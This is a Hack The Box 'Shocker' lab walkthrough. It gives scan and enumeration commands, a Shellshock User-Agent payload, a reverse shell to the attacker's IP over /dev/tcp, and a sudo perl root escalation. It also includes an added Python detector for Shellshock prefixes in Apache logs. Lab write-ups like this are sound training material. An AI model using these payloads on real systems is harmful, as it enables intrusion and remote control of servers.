Hack The Box (HTB) — Shocker — Walkthrough

Introduction

Reconnaissance

Scanning

nmap -Pn 10.10.10.56
nmap -p 80,2222 10.10.10.56 -sV -sC

Enumeration

gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt -t 30
gobuster dir -u http://10.10.10.56/cgi-bin/ -x .php,.html,.txt,.sh -w /usr/share/wordlists/dirb/common.txt -t 30
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.56/cgi-bin/user.sh

Exploitation

nc -lvnp 443
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -i >& /dev/tcp/10.10.14.30/443 0>&1" http://10.10.10.56/cgi-bin/user.sh
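
On the defensive side, the requests above leave a recognizable trace in the web server's access log: a User-Agent value that starts with the Bash function-definition prefix `() {`. The following Python is an added example, not part of the original walkthrough; it assumes Apache's "combined" log format, and the sample log lines and the function name `find_function_def_headers` are constructed for illustration.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may hold backslash-escaped quotes, so escapes are matched explicitly.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)
# Bash function-definition prefix as sent in the requests above: "() {"
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 53 "-" "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /robots.txt HTTP/1.1" 404 0 "() { :; }; echo probe" "curl/7.88.1"',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 53 "-" "curl/7.88.1"',
]

def find_function_def_headers(lines):
    """Return one finding per log line whose request, referer or user-agent
    contains a Bash function-definition prefix."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; skip rather than guess
        host, _time, request, status, referer, agent = match.groups()
        parts = request.split()
        path = parts[1] if len(parts) >= 2 else ""
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        for name, value in fields:
            if FUNC_DEF_RE.search(value):
                findings.append({
                    "line": number, "host": host, "field": name, "path": path,
                    "status": int(status),
                    # CGI targets are where Bash would actually see the header
                    "cgi_target": path.startswith("/cgi-bin/"),
                })
                break
    return findings

if __name__ == "__main__":
    for finding in find_function_def_headers(SAMPLE_LOG):
        print(finding)
```

The combined format records only the request line, Referer and User-Agent, so the same prefix sent in any other header will not appear in this log. A hit with `cgi_target` set and a 200 status deserves priority, since that request reached a script where Bash could have processed the header.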

Privilege Escalation

sudo perl -e 'exec "/bin/sh";'
